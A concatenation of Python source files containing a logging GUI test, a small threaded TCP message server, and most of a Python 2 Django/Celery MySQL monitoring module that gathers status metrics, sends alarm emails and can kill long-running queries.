#########################
def waitForMessageOnTopic(self, topic):
if self.get(topic) is not None:
return
self.waitForNewMessageOnTopic(topic)
def waitForNewMessageOnTopic(self, topic):
event = Event()
self._topicEvents[topic] = event
event.wait()
self._topicEvents[topic] = None
|
test_balsa_gui.py
|
import time
import threading
import pyautogui
from balsa import get_logger, Balsa, __author__
from test_balsa import enter_press_time
def press_enter():
time.sleep(enter_press_time)
pyautogui.press("enter")
def test_balsa_gui():
application_name = "test_balsa_gui"
balsa = Balsa(application_name, __author__, verbose=True, log_directory="temp", gui=True, is_root=False, delete_existing_log_files=True)
balsa.init_logger()
log = get_logger(application_name)
press_enter_thread = threading.Thread(target=press_enter)
press_enter_thread.start()
log.error("test error message")
press_enter_thread.join()
if __name__ == "__main__":
test_balsa_gui()
|
server.py
|
# -*- coding: utf-8 -*-
# @Author: TD21forever
# @Date: 2019-11-24 01:12:39
# @Last Modified by: TD21forever
# @Last Modified time: 2019-11-24 15:40:39
from socket import *
import threading
def stoc(client_socket, addr):
while True:
try:
client_socket.settimeout(500)
buf = client_socket.recv(1024)
print("*" * 10)
print("msg from:", addr[1])
print("msg:", buf.decode('utf-8'))
print("*" * 10)
except socket.timeout:
print("Time Out")
break
#""表示localhost
myHost = ""
myPort = 50007
# 设置一个TCP socket对象
server = socket(AF_INET, SOCK_STREAM)
# 绑定端口号
server.bind((myHost, myPort))
# 监听,允许5个连结
server.listen(5)
while True:
# 等待客户端连接
client, address = server.accept()
print("Server conneted by", address)
thread = threading.Thread(target=stoc, args=(client, address))
thread.start()
|
mon.py
|
# -*- coding: utf-8 =*-
from celery import shared_task
import time,string
from django.template import loader
from dbmanage.myapp.models import MySQL_monitor
from dbmanage.myapp.models import Db_instance,Db_account
import MySQLdb,datetime
from dbmanage.myapp.include.encrypt import prpcrypt
from dbmanage.myapp.tasks import sendmail
from dbmanage.monitor.models import Mysql_processlist,Mysql_replication,MysqlStatus,Alarm,AlarmTemp
from dbmanage.myapp.include.scheduled import mysql_exec
from django.utils import timezone
from dbmanage.bkrs.models import BackupLog,count_day_status,count_mon_status,backfailed,BackupHostConf
import threading
import calendar
class Connect(object):
def __init__(self,ip=None,port=None,user=None,passwd=None):
self.ip = ip
self.port = int(port)
self.user = user
self.passwd = passwd
def query_mysql(self,sql):
try:
conn=MySQLdb.connect(host=self.ip,user=self.user,passwd=self.passwd,port=self.port,connect_timeout=5,charset='utf8')
conn.select_db('information_schema')
cursor = conn.cursor()
count=cursor.execute(sql)
index=cursor.description
col=[]
#get column name
for i in index:
col.append(i[0])
result=cursor.fetchall()
cursor.close()
conn.close()
return (result,col)
except Exception,e:
return([str(e)],''),['error']
def kill_id(self,idlist):
try:
conn=MySQLdb.connect(host=self.ip,user=self.user,passwd=self.passwd,port=self.port,connect_timeout=5,charset='utf8')
conn.select_db('information_schema')
curs = conn.cursor()
for i in idlist:
try:
curs.execute(i)
except Exception, e:
pass
conn.commit()
curs.close()
conn.close()
results = 'success'
except Exception, e:
results = 'error'
return results
# active sql,long sql,slave stop,slave delay,connections
alarm_list = {
1:'active sql',
2:'long sql',
3:'long sql killed',
4:'slave stop',
5:'slave delay',
6:'connections',
7:'server down'
}
# @task
# def sendmail_monitor(title,mailto,data,alarm_type):
# if alarm_type in ['active sql','long sql'] and data!='ok':
# mon_sqllist = data
# elif data == 'ok':
# alarm_information = alarm_type+' ok'
# else:
# alarm_information = data
# # print alarm_information
# html_content = loader.render_to_string('include/mail_template.html', locals())
# sendmail(title, mailto, html_content)
@shared_task()
def backup_statistics():
try:
#预设每个平台每天备份5个文件为成功
everyday_back_file = 0
#count_day_status
back_file_success = 0
back_customers_success = 0
back_file_failed = 0
back_customers_failed = 0
#count_mon_status
back_customers_mon = 0
back_customers_stop_mon = 0
back_file_cur_mon = 0
def getMonthFirstDayAndLastDay(year=None, month=None):
"""
:param year: 年份,默认是本年,可传int或str类型
:param month: 月份,默认是本月,可传int或str类型
:return: firstDay: 当月的第一天,datetime.date类型
lastDay: 当月的最后一天,datetime.date类型
"""
if year:
year = int(year)
else:
year = datetime.date.today().year
if month:
month = int(month)
else:
month = datetime.date.today().month
# 获取当月第一天的星期和当月的总天数
firstDayWeekDay, monthRange = calendar.monthrange(year, month)
# 获取当月的第一天
firstDay = datetime.date(year=year, month=month, day=1)
lastDay = datetime.date(year=year, month=month, day=monthRange)
return firstDay, lastDay
firstday,lastday = getMonthFirstDayAndLastDay(datetime.datetime.today().year,datetime.datetime.today().month)
cur_mon = str(time.strftime('%Y-%m',time.localtime(time.time())))
yesterday = str(datetime.date.today()-datetime.timedelta(days=1))
today = str(datetime.date.today()-datetime.timedelta(days=0))
back_file_success = BackupLog.objects.filter(start_date__gte=yesterday,start_date__lte=today).count()
back_file_failed = backfailed.objects.filter(start_date__gte=yesterday,start_date__lte=today).count()
back_customers_failed = backfailed.objects.all().values('host').distinct().count()
bback_customers_all= BackupLog.objects.all().values('host').distinct().count()
back_customers_success = bback_customers_all - back_customers_failed
count_day_status.objects.create(count_date=yesterday,
back_file_success=back_file_success,
back_customers_success=back_customers_success,
back_file_failed=back_file_failed,
back_customers_failed=back_customers_failed)
back_customers_mon = BackupHostConf.objects.filter(status=0).count()
back_customers_stop_mon = BackupHostConf.objects.filter(status=1).count()
back_file_cur_mon = BackupLog.objects.filter(start_date__gte=firstday,start_date_lte=lastday)
# db.query("select count(*) from backarchives where DATE_FORMAT(back_time,'%%Y-%%m')='%s'" %cur_mon)[0][0]
#
# cur_mon_count = db.query("select id from count_mon_status where count_date='%s'" %cur_mon)
# if cur_mon_count:
# cur_mon_id = cur_mon_count[0][0]
# sql = "update count_mon_status set back_customers=%s,back_customers_stop=%s,back_file=%s where id=%s" %(back_customers_mon,back_customers_stop_mon,back_file_cur_mon,cur_mon_id)
# #print sql
# db.update(sql)
# else:
# sql = "insert into count_mon_status(count_date,back_customers,back_customers_stop,back_file) " \
# "values('%s',%s,%s,%s)" %(cur_mon,back_customers_mon,back_customers_stop_mon,back_file_cur_mon)
# #print sql
# db.update(sql)
#
# db.close()
except:
pass
@shared_task()
def sendmail_monitor(instance_id,mailto,data,alarm_type):
instance = Db_instance.objects.get(id=instance_id)
dbinfo = 'IP: '+instance.ip + '\n' + 'PORT: ' + instance.port + '\n'
title = ''
if data=='ok':
alarm_information = alarm_list[alarm_type] + ' ok'
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+alarm_information
elif alarm_type in [1,2,3]:
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+ alarm_list[alarm_type]
mon_sqllist = data
elif alarm_type == 6:
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+ 'too many connections'
alarm_information = 'values: '+ str(data)
elif alarm_type == 5:
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+ alarm_list[alarm_type]
alarm_information = 'values: '+ str(data)
elif alarm_type == 4:
alarm_information = 'SLAVE_IO_THREAD:'+ data['iothread'] + '\nSLAVE_SQL_THREAD:' + data['sqlthread'] + '\n'
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+ alarm_list[alarm_type]
elif alarm_type == 7:
title = instance.ip+':'+instance.port+'['+instance.comments+']'+'---------'+ alarm_list[alarm_type]
alarm_information = "MySQL Server Down"
html_content = loader.render_to_string('include/mail_template.html', locals())
sendmail(title, mailto, html_content)
@shared_task()
def mon_mysql():
monlist = MySQL_monitor.objects.filter(monitor=1)
no_monlist = MySQL_monitor.objects.filter(monitor=0)
if len(no_monlist)>0:
for i in no_monlist:
Mysql_replication.objects.filter(db_ip=i.instance.ip).filter(db_port=i.instance.port).delete()
MysqlStatus.objects.filter(db_ip=i.instance.ip).filter(db_port=i.instance.port).delete()
# plist=[]
if len(monlist)>0:
for i in monlist:
# check_mysql.apply_async((i,),queue='mysql_monitor',routing_key='monitor.mysql')
# check_mysql_host.delay(i.instance_id,i.account_id)
t = threading.Thread(target=check_mysql_host,args=(i.instance_id,i.account_id,))
t.start()
print i.tag,datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
@shared_task()
def test(x,y):
return x*y
@shared_task
def check_mysql_host(instance_id,account_id):
instance = Db_instance.objects.get(id=instance_id)
db_account = Db_account.objects.get(id=account_id)
mon_basic(instance,db_account)
# longlist = []
py = prpcrypt()
#
conn_info = Connect(instance.ip,instance.port,db_account.user,py.decrypt(db_account.passwd))
result,col = conn_info.query_mysql("select ID,USER,HOST,DB,COMMAND,TIME,STATE,INFO from information_schema.processlist where COMMAND !='Sleep' and DB not in ('information_schema','sys') and user not in ('system user','event_scheduler') and command!='Binlog Dump' and info like 'select%'")
# result,col = conn_info.query_mysql("select ID,USER,HOST,DB,COMMAND,TIME,STATE,INFO from processlist")
mysql_monitor = MySQL_monitor.objects.get(instance_id=instance.id)
if mysql_monitor.check_longsql == 1:
try:
longsql_send = filter(lambda x:int(x[5])>int(mysql_monitor.longsql_time),result)
except Exception,e:
longsql_send=''
# print longsql_send
alarm_type = 2
if len(longsql_send)>0:
flag = record_alarm(mysql_monitor, alarm_type)
if mysql_monitor.longsql_autokill == 1:
idlist = map(lambda x:'kill '+str(x[0])+';',longsql_send)
conn_info.kill_id(idlist)
sendmail_monitor.delay(instance.id,mysql_monitor.mail_to.split(';'), longsql_send,3)
elif flag:
sendmail_monitor.delay(instance.id,mysql_monitor.mail_to.split(';'),longsql_send,alarm_type)
else:
check_ifok(instance, alarm_type)
if mysql_monitor.check_active == 1 :
alarm_type = 1
if len(result)>=int(mysql_monitor.active_threshold) :
if record_alarm(mysql_monitor, alarm_type):
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'), result,alarm_type)
else:
check_ifok(instance, alarm_type)
insertlist=[]
# for i in result:
# insertlist.append(Mysql_processlist(conn_id=i[0],user=i[1],host=i[2],db=i[3],\
# command=i[4],time=i[5],state=i[6],info=i[7]))
if len(result)>0 and type(result[0][0]) == int :
try:
insertlist = map(lambda x:Mysql_processlist(db_ip=instance.ip,db_port=instance.port,
conn_id=x[0],user=x[1],host=x[2],db=x[3],
command=x[4],time=x[5],state=x[6],info=x[7]),result)
# print insertlist
Mysql_processlist.objects.bulk_create(insertlist)
except Exception,e:
print e
def record_alarm(mysql_monitor,num):
instance = Db_instance.objects.get(id=mysql_monitor.instance_id)
alarm_type = alarm_list[num]
time = timezone.now()-datetime.timedelta(minutes=mysql_monitor.alarm_interval)
if len(AlarmTemp.objects.filter(db_ip=instance.ip, db_port=instance.port,alarm_type=alarm_type,create_time__gte=time))< int(mysql_monitor.alarm_times) + 2:
new_alarm = Alarm(send_mail=1,db_ip=instance.ip, db_port=instance.port, alarm_type=alarm_type)
new_alarm.save()
new_alarm1 = AlarmTemp(db_ip=instance.ip, db_port=instance.port, alarm_type=alarm_type)
new_alarm1.save()
if len(AlarmTemp.objects.filter(db_ip=instance.ip, db_port=instance.port,alarm_type=alarm_type,create_time__gte=time)) <=2:
new_alarm.send_mail = 0
new_alarm.save()
return False
else:
return True
else:
new_alarm = Alarm(send_mail=0, db_ip=instance.ip, db_port=instance.port, alarm_type=alarm_type)
new_alarm.save()
return False
def check_ifok(instance,num):
alarm_type = alarm_list[num]
mysql_monitor = MySQL_monitor.objects.get(instance_id=instance.id)
if AlarmTemp.objects.filter(db_ip=instance.ip, db_port=instance.port,alarm_type=alarm_type)[:1]:
AlarmTemp.objects.filter(db_ip=instance.ip, db_port=instance.port, alarm_type=alarm_type).delete()
sendmail_monitor.delay(instance.id, mysql_monitor.mail_to.split(';'),'ok', num)
def mon_basic(instance,db_account):
mysql_monitor = MySQL_monitor.objects.get(instance=instance.id)
now_time = timezone.now()
try:
py = prpcrypt()
conn = MySQLdb.connect(host=instance.ip, user=db_account.user, passwd=py.decrypt(db_account.passwd), port=int(instance.port), connect_timeout=3, charset='utf8')
conn.autocommit(True)
cur = conn.cursor()
conn.select_db('information_schema')
check_ifok(instance,7)
############################# CHECK MYSQL ####################################################
mysql_variables = get_mysql_variables(cur)
mysql_status = get_mysql_status(cur)
time.sleep(1)
mysql_status_2 = get_mysql_status(cur)
############################# GET VARIABLES ###################################################
version = get_item(mysql_variables, 'version')
key_buffer_size = get_item(mysql_variables, 'key_buffer_size')
sort_buffer_size = get_item(mysql_variables, 'sort_buffer_size')
join_buffer_size = get_item(mysql_variables, 'join_buffer_size')
max_connections = get_item(mysql_variables, 'max_connections')
max_connect_errors = get_item(mysql_variables, 'max_connect_errors')
open_files_limit = get_item(mysql_variables, 'open_files_limit')
table_open_cache = get_item(mysql_variables, 'table_open_cache')
max_tmp_tables = get_item(mysql_variables, 'max_tmp_tables')
max_heap_table_size = get_item(mysql_variables, 'max_heap_table_size')
max_allowed_packet = get_item(mysql_variables, 'max_allowed_packet')
thread_cache_size = get_item(mysql_variables, 'thread_cache_size')
############################# GET INNODB INFO ##################################################
# innodb variables
innodb_version = get_item(mysql_variables, 'innodb_version')
innodb_buffer_pool_instances = get_item(mysql_variables, 'innodb_buffer_pool_instances')
innodb_buffer_pool_size = get_item(mysql_variables, 'innodb_buffer_pool_size')
innodb_doublewrite = get_item(mysql_variables, 'innodb_doublewrite')
innodb_file_per_table = get_item(mysql_variables, 'innodb_file_per_table')
innodb_flush_log_at_trx_commit = get_item(mysql_variables, 'innodb_flush_log_at_trx_commit')
innodb_flush_method = get_item(mysql_variables, 'innodb_flush_method')
innodb_force_recovery = get_item(mysql_variables, 'innodb_force_recovery')
innodb_io_capacity = get_item(mysql_variables, 'innodb_io_capacity')
innodb_read_io_threads = get_item(mysql_variables, 'innodb_read_io_threads')
innodb_write_io_threads = get_item(mysql_variables, 'innodb_write_io_threads')
# innodb status
innodb_buffer_pool_pages_total = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_total'))
innodb_buffer_pool_pages_data = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_data'))
innodb_buffer_pool_pages_dirty = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_dirty'))
innodb_buffer_pool_pages_flushed = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_flushed'))
innodb_buffer_pool_pages_free = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_free'))
innodb_buffer_pool_pages_misc = int(get_item(mysql_status, 'Innodb_buffer_pool_pages_misc'))
innodb_buffer_pool_wait_free = int(get_item(mysql_status, 'Innodb_buffer_pool_wait_free'))
if innodb_buffer_pool_pages_misc > 18046744073709540000:
innodb_buffer_pool_pages_misc = 0
innodb_page_size = int(get_item(mysql_status, 'Innodb_page_size'))
innodb_pages_created = int(get_item(mysql_status, 'Innodb_pages_created'))
innodb_pages_read = int(get_item(mysql_status, 'Innodb_pages_read'))
innodb_pages_written = int(get_item(mysql_status, 'Innodb_pages_written'))
innodb_row_lock_current_waits = int(get_item(mysql_status, 'Innodb_row_lock_current_waits'))
innodb_row_lock_time = int(get_item(mysql_status, 'Innodb_row_lock_time'))
innodb_row_lock_waits = int(get_item(mysql_status, 'Innodb_row_lock_waits'))
innodb_log_waits = int(get_item(mysql_status, 'Innodb_log_waits'))
# innodb persecond info
innodb_buffer_pool_read_requests_persecond = int(
get_item(mysql_status_2, 'Innodb_buffer_pool_read_requests')) - int(
get_item(mysql_status, 'Innodb_buffer_pool_read_requests'))
innodb_buffer_pool_reads_persecond = int(get_item(mysql_status_2, 'Innodb_buffer_pool_reads')) - int(
get_item(mysql_status, 'Innodb_buffer_pool_reads'))
innodb_buffer_pool_write_requests_persecond = int(
get_item(mysql_status_2, 'Innodb_buffer_pool_write_requests')) - int(
get_item(mysql_status, 'Innodb_buffer_pool_write_requests'))
innodb_buffer_pool_pages_flushed_persecond = int(
get_item(mysql_status_2, 'Innodb_buffer_pool_pages_flushed')) - int(
get_item(mysql_status, 'Innodb_buffer_pool_pages_flushed'))
innodb_rows_deleted_persecond = int(get_item(mysql_status_2, 'Innodb_rows_deleted')) - int(
get_item(mysql_status, 'Innodb_rows_deleted'))
innodb_rows_inserted_persecond = int(get_item(mysql_status_2, 'Innodb_rows_inserted')) - int(
get_item(mysql_status, 'Innodb_rows_inserted'))
innodb_rows_read_persecond = int(get_item(mysql_status_2, 'Innodb_rows_read')) - int(
get_item(mysql_status, 'Innodb_rows_read'))
innodb_rows_updated_persecond = int(get_item(mysql_status_2, 'Innodb_rows_updated')) - int(
get_item(mysql_status, 'Innodb_rows_updated'))
############################# GET STATUS ##################################################
connect = 1
uptime = get_item(mysql_status, 'Uptime')
open_files = get_item(mysql_status, 'Open_files')
open_tables = get_item(mysql_status, 'Open_tables')
opened_tables = get_item(mysql_status, 'Opened_tables')
threads_connected = get_item(mysql_status, 'Threads_connected')
threads_running = get_item(mysql_status, 'Threads_running')
threads_created = get_item(mysql_status, 'Threads_created')
threads_cached = get_item(mysql_status, 'Threads_cached')
# threads_waits = 20
max_used_connections = get_item(mysql_status, 'Max_used_connections')
connections = get_item(mysql_status, 'Connections')
aborted_clients = get_item(mysql_status, 'Aborted_clients')
aborted_connects = get_item(mysql_status, 'Aborted_connects')
key_blocks_not_flushed = get_item(mysql_status, 'Key_blocks_not_flushed')
key_blocks_unused = get_item(mysql_status, 'Key_blocks_unused')
key_blocks_used = get_item(mysql_status, 'Key_blocks_used')
slow_queries = int(get_item(mysql_status, 'Slow_queries'))
############################# GET STATUS PERSECOND ##################################################
threads_created_percond = int(get_item(mysql_status_2, 'Threads_created')) - int(threads_created)
connections_persecond = int(get_item(mysql_status_2, 'Connections')) - int(get_item(mysql_status, 'Connections'))
bytes_received_persecond = (int(get_item(mysql_status_2, 'Bytes_received')) - int(
get_item(mysql_status, 'Bytes_received'))) / 1024
bytes_sent_persecond = (int(get_item(mysql_status_2, 'Bytes_sent')) - int(
get_item(mysql_status, 'Bytes_sent'))) / 1024
com_select_persecond = int(get_item(mysql_status_2, 'Com_select')) - int(get_item(mysql_status, 'Com_select'))
com_insert_persecond = int(get_item(mysql_status_2, 'Com_insert')) - int(get_item(mysql_status, 'Com_insert'))
com_update_persecond = int(get_item(mysql_status_2, 'Com_update')) - int(get_item(mysql_status, 'Com_update'))
com_delete_persecond = int(get_item(mysql_status_2, 'Com_delete')) - int(get_item(mysql_status, 'Com_delete'))
com_commit_persecond = int(get_item(mysql_status_2, 'Com_commit')) - int(get_item(mysql_status, 'Com_commit'))
com_rollback_persecond = int(get_item(mysql_status_2, 'Com_rollback')) - int(get_item(mysql_status, 'Com_rollback'))
questions_persecond = int(get_item(mysql_status_2, 'Questions')) - int(get_item(mysql_status, 'Questions'))
queries_persecond = int(get_item(mysql_status_2, 'Queries')) - int(get_item(mysql_status, 'Queries'))
transaction_persecond = (int(get_item(mysql_status_2, 'Com_commit')) + int(
get_item(mysql_status_2, 'Com_rollback'))) - (
int(get_item(mysql_status, 'Com_commit')) + int(get_item(mysql_status, 'Com_rollback')))
created_tmp_disk_tables_persecond = int(get_item(mysql_status_2, 'Created_tmp_disk_tables')) - int(
get_item(mysql_status, 'Created_tmp_disk_tables'))
created_tmp_files_persecond = int(get_item(mysql_status_2, 'Created_tmp_files')) - int(
get_item(mysql_status, 'Created_tmp_files'))
created_tmp_tables_persecond = int(get_item(mysql_status_2, 'Created_tmp_tables')) - int(
get_item(mysql_status, 'Created_tmp_tables'))
table_locks_immediate_persecond = int(get_item(mysql_status_2, 'Table_locks_immediate')) - int(
get_item(mysql_status, 'Table_locks_immediate'))
table_locks_waited_persecond = int(get_item(mysql_status_2, 'Table_locks_waited')) - int(
get_item(mysql_status, 'Table_locks_waited'))
key_read_requests_persecond = int(get_item(mysql_status_2, 'Key_read_requests')) - int(
get_item(mysql_status, 'Key_read_requests'))
key_reads_persecond = int(get_item(mysql_status_2, 'Key_reads')) - int(get_item(mysql_status, 'Key_reads'))
key_write_requests_persecond = int(get_item(mysql_status_2, 'Key_write_requests')) - int(
get_item(mysql_status, 'Key_write_requests'))
key_writes_persecond = int(get_item(mysql_status_2, 'Key_writes')) - int(get_item(mysql_status, 'Key_writes'))
############################# GET MYSQL HITRATE ##################################################
if (string.atof(get_item(mysql_status, 'Qcache_hits')) + string.atof(get_item(mysql_status, 'Com_select'))) <> 0:
query_cache_hitrate = string.atof(get_item(mysql_status, 'Qcache_hits')) / (
string.atof(get_item(mysql_status, 'Qcache_hits')) + string.atof(get_item(mysql_status, 'Com_select')))
query_cache_hitrate = "%9.2f" % query_cache_hitrate
else:
query_cache_hitrate = 0
if string.atof(get_item(mysql_status, 'Connections')) <> 0:
thread_cache_hitrate = 1 - string.atof(get_item(mysql_status, 'Threads_created')) / string.atof(
get_item(mysql_status, 'Connections'))
thread_cache_hitrate = "%9.2f" % thread_cache_hitrate
else:
thread_cache_hitrate = 0
if string.atof(get_item(mysql_status, 'Key_read_requests')) <> 0:
key_buffer_read_rate = 1 - string.atof(get_item(mysql_status, 'Key_reads')) / string.atof(
get_item(mysql_status, 'Key_read_requests'))
key_buffer_read_rate = "%9.2f" % key_buffer_read_rate
else:
key_buffer_read_rate = 0
if string.atof(get_item(mysql_status, 'Key_write_requests')) <> 0:
key_buffer_write_rate = 1 - string.atof(get_item(mysql_status, 'Key_writes')) / string.atof(
get_item(mysql_status, 'Key_write_requests'))
key_buffer_write_rate = "%9.2f" % key_buffer_write_rate
else:
key_buffer_write_rate = 0
if (string.atof(get_item(mysql_status, 'Key_blocks_used')) + string.atof(
get_item(mysql_status, 'Key_blocks_unused'))) <> 0:
key_blocks_used_rate = string.atof(get_item(mysql_status, 'Key_blocks_used')) / (
string.atof(get_item(mysql_status, 'Key_blocks_used')) + string.atof(
get_item(mysql_status, 'Key_blocks_unused')))
key_blocks_used_rate = "%9.2f" % key_blocks_used_rate
else:
key_blocks_used_rate = 0
if (string.atof(get_item(mysql_status, 'Created_tmp_disk_tables')) + string.atof(
get_item(mysql_status, 'Created_tmp_tables'))) <> 0:
created_tmp_disk_tables_rate = string.atof(get_item(mysql_status, 'Created_tmp_disk_tables')) / (
string.atof(get_item(mysql_status, 'Created_tmp_disk_tables')) + string.atof(
get_item(mysql_status, 'Created_tmp_tables')))
created_tmp_disk_tables_rate = "%9.2f" % created_tmp_disk_tables_rate
else:
created_tmp_disk_tables_rate = 0
if string.atof(max_connections) <> 0:
connections_usage_rate = string.atof(threads_connected) / string.atof(max_connections)
connections_usage_rate = "%9.2f" % connections_usage_rate
else:
connections_usage_rate = 0
if string.atof(open_files_limit) <> 0:
open_files_usage_rate = string.atof(open_files) / string.atof(open_files_limit)
open_files_usage_rate = "%9.2f" % open_files_usage_rate
else:
open_files_usage_rate = 0
if string.atof(table_open_cache) <> 0:
open_tables_usage_rate = string.atof(open_tables) / string.atof(table_open_cache)
open_tables_usage_rate = "%9.2f" % open_tables_usage_rate
else:
open_tables_usage_rate = 0
# repl
slave_status = cur.execute('show slave status;')
if slave_status <> 0:
role = 'slave'
role_new = 's'
else:
role = 'master'
role_new = 'm'
############################# INSERT INTO SERVER ##################################################
sql_insert = "replace into mysql_status(db_ip,db_port,connect,role,uptime,version,max_connections,max_connect_errors,open_files_limit,table_open_cache,max_tmp_tables,max_heap_table_size,max_allowed_packet,open_files,open_tables,threads_connected,threads_running,threads_created,threads_cached,connections,aborted_clients,aborted_connects,connections_persecond,bytes_received_persecond,bytes_sent_persecond,com_select_persecond,com_insert_persecond,com_update_persecond,com_delete_persecond,com_commit_persecond,com_rollback_persecond,questions_persecond,queries_persecond,transaction_persecond,created_tmp_tables_persecond,created_tmp_disk_tables_persecond,created_tmp_files_persecond,table_locks_immediate_persecond,table_locks_waited_persecond,key_buffer_size,sort_buffer_size,join_buffer_size,key_blocks_not_flushed,key_blocks_unused,key_blocks_used,key_read_requests_persecond,key_reads_persecond,key_write_requests_persecond,key_writes_persecond,innodb_version,innodb_buffer_pool_instances,innodb_buffer_pool_size,innodb_doublewrite,innodb_file_per_table,innodb_flush_log_at_trx_commit,innodb_flush_method,innodb_force_recovery,innodb_io_capacity,innodb_read_io_threads,innodb_write_io_threads,innodb_buffer_pool_pages_total,innodb_buffer_pool_pages_data,innodb_buffer_pool_pages_dirty,innodb_buffer_pool_pages_flushed,innodb_buffer_pool_pages_free,innodb_buffer_pool_pages_misc,innodb_page_size,innodb_pages_created,innodb_pages_read,innodb_pages_written,innodb_row_lock_current_waits,innodb_buffer_pool_pages_flushed_persecond,innodb_buffer_pool_read_requests_persecond,innodb_buffer_pool_reads_persecond,innodb_buffer_pool_write_requests_persecond,innodb_rows_read_persecond,innodb_rows_inserted_persecond,innodb_rows_updated_persecond,innodb_rows_deleted_persecond,query_cache_hitrate,thread_cache_hitrate,key_buffer_read_rate,key_buffer_write_rate,key_blocks_used_rate,created_tmp_disk_tables_rate,connections_usage_rate,open_files_usage_rate,open_tables_usage_rate,create_time) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
sql_update = "update mysql_status set db_ip=%s,db_port=%s,connect=%s,role=%s,uptime=%s,version=%s,max_connections=%s,max_connect_errors=%s,open_files_limit=%s,table_open_cache=%s,max_tmp_tables=%s,max_heap_table_size=%s,max_allowed_packet=%s,open_files=%s,open_tables=%s,threads_connected=%s,threads_running=%s,threads_created=%s,threads_cached=%s,connections=%s,aborted_clients=%s,aborted_connects=%s,connections_persecond=%s,bytes_received_persecond=%s,bytes_sent_persecond=%s,com_select_persecond=%s,com_insert_persecond=%s,com_update_persecond=%s,com_delete_persecond=%s,com_commit_persecond=%s,com_rollback_persecond=%s,questions_persecond=%s,queries_persecond=%s,transaction_persecond=%s,created_tmp_tables_persecond=%s,created_tmp_disk_tables_persecond=%s,created_tmp_files_persecond=%s,table_locks_immediate_persecond=%s,table_locks_waited_persecond=%s,key_buffer_size=%s,sort_buffer_size=%s,join_buffer_size=%s,key_blocks_not_flushed=%s,key_blocks_unused=%s,key_blocks_used=%s,key_read_requests_persecond=%s,key_reads_persecond=%s,key_write_requests_persecond=%s,key_writes_persecond=%s,innodb_version=%s,innodb_buffer_pool_instances=%s,innodb_buffer_pool_size=%s,innodb_doublewrite=%s,innodb_file_per_table=%s,innodb_flush_log_at_trx_commit=%s,innodb_flush_method=%s,innodb_force_recovery=%s,innodb_io_capacity=%s,innodb_read_io_threads=%s,innodb_write_io_threads=%s,innodb_buffer_pool_pages_total=%s,innodb_buffer_pool_pages_data=%s,innodb_buffer_pool_pages_dirty=%s,innodb_buffer_pool_pages_flushed=%s,innodb_buffer_pool_pages_free=%s,innodb_buffer_pool_pages_misc=%s,innodb_page_size=%s,innodb_pages_created=%s,innodb_pages_read=%s,innodb_pages_written=%s,innodb_row_lock_current_waits=%s,innodb_buffer_pool_pages_flushed_persecond=%s,innodb_buffer_pool_read_requests_persecond=%s,innodb_buffer_pool_reads_persecond=%s,innodb_buffer_pool_write_requests_persecond=%s,innodb_rows_read_persecond=%s,innodb_rows_inserted_persecond=%s,innodb_rows_updated_persecond=%s,innodb_rows_deleted_persecond=%s,query_cache_hitrate=%s,thread_cache_hitrate=%s,key_buffer_read_rate=%s,key_buffer_write_rate=%s,key_blocks_used_rate=%s,created_tmp_disk_tables_rate=%s,connections_usage_rate=%s,open_files_usage_rate=%s,open_tables_usage_rate=%s,create_time=%s where db_ip=%s and db_port=%s; "
sql2 = "insert into mysql_status_his(db_ip,db_port,connect,role,uptime,version,max_connections,max_connect_errors,open_files_limit,table_open_cache,max_tmp_tables,max_heap_table_size,max_allowed_packet,open_files,open_tables,threads_connected,threads_running,threads_created,threads_cached,connections,aborted_clients,aborted_connects,connections_persecond,bytes_received_persecond,bytes_sent_persecond,com_select_persecond,com_insert_persecond,com_update_persecond,com_delete_persecond,com_commit_persecond,com_rollback_persecond,questions_persecond,queries_persecond,transaction_persecond,created_tmp_tables_persecond,created_tmp_disk_tables_persecond,created_tmp_files_persecond,table_locks_immediate_persecond,table_locks_waited_persecond,key_buffer_size,sort_buffer_size,join_buffer_size,key_blocks_not_flushed,key_blocks_unused,key_blocks_used,key_read_requests_persecond,key_reads_persecond,key_write_requests_persecond,key_writes_persecond,innodb_version,innodb_buffer_pool_instances,innodb_buffer_pool_size,innodb_doublewrite,innodb_file_per_table,innodb_flush_log_at_trx_commit,innodb_flush_method,innodb_force_recovery,innodb_io_capacity,innodb_read_io_threads,innodb_write_io_threads,innodb_buffer_pool_pages_total,innodb_buffer_pool_pages_data,innodb_buffer_pool_pages_dirty,innodb_buffer_pool_pages_flushed,innodb_buffer_pool_pages_free,innodb_buffer_pool_pages_misc,innodb_page_size,innodb_pages_created,innodb_pages_read,innodb_pages_written,innodb_row_lock_current_waits,innodb_buffer_pool_pages_flushed_persecond,innodb_buffer_pool_read_requests_persecond,innodb_buffer_pool_reads_persecond,innodb_buffer_pool_write_requests_persecond,innodb_rows_read_persecond,innodb_rows_inserted_persecond,innodb_rows_updated_persecond,innodb_rows_deleted_persecond,query_cache_hitrate,thread_cache_hitrate,key_buffer_read_rate,key_buffer_write_rate,key_blocks_used_rate,created_tmp_disk_tables_rate,connections_usage_rate,open_files_usage_rate,open_tables_usage_rate,create_time) 